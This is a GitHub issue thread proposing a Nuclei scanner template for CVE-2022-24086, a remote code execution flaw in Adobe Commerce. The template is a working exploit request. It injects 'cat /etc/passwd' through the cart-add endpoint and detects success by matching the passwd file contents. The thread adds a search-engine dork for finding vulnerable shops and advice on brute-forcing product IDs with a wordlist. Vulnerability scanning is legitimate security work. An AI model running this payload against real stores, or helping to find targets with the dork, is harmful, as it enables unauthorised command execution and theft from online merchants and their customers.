### ISSUE TITLE
CVE-2022-24086 Help needed

### ISSUE THREAD

**Issue by forta-protocol** [projectdiscovery/nuclei-templates#3787]
### Template Information:

dorks: inurl:"checkout/cart/add/product"

### Nuclei Template:

```yaml
id: CVE-2022-24086

info:
  name: CVE-2022-24086
  author: akincibor
  severity: critical
  description: Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
  reference: https://github.com/Mr-xn/CVE-2022-24086
  tags: rce

  classification:
    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-24086
    cwe-id: CWE-20

requests:
  - method: POST
    path:
      - "{{BaseURL}}/checkout/cart/add/product/${product_id}/uenc?0=cat+/etc/passwd"
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
```

${product_id} = We need bruteforce to find valid product id, 0 to 10000 is enough

**Comment by ehsandeep** [comment]
Using static wordlist containing product ids is also an option, for example:

https://github.com/projectdiscovery/nuclei-templates/blob/915bb09a8201495c852c6a8ceb101f3606f3bc49/misconfiguration/gitlab/gitlab-user-enum.yaml#L19

**Comment by StrikePrivate** [comment]
```yaml
id: CVE-2022-24086

info:
  name: CVE-2022-24086
  author: akincibor
  severity: critical
  description: Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
  reference: https://github.com/Mr-xn/CVE-2022-24086
  tags: rce

  classification:
    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-24086
    cwe-id: CWE-20

requests:
  - method: POST
    path:
      - "{{BaseURL}}/checkout/cart/add/product/{{product_id}}/uenc?0=cat+/etc/passwd"
    payloads:
      product_id: helpers/wordlists/numbers.tx
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
```
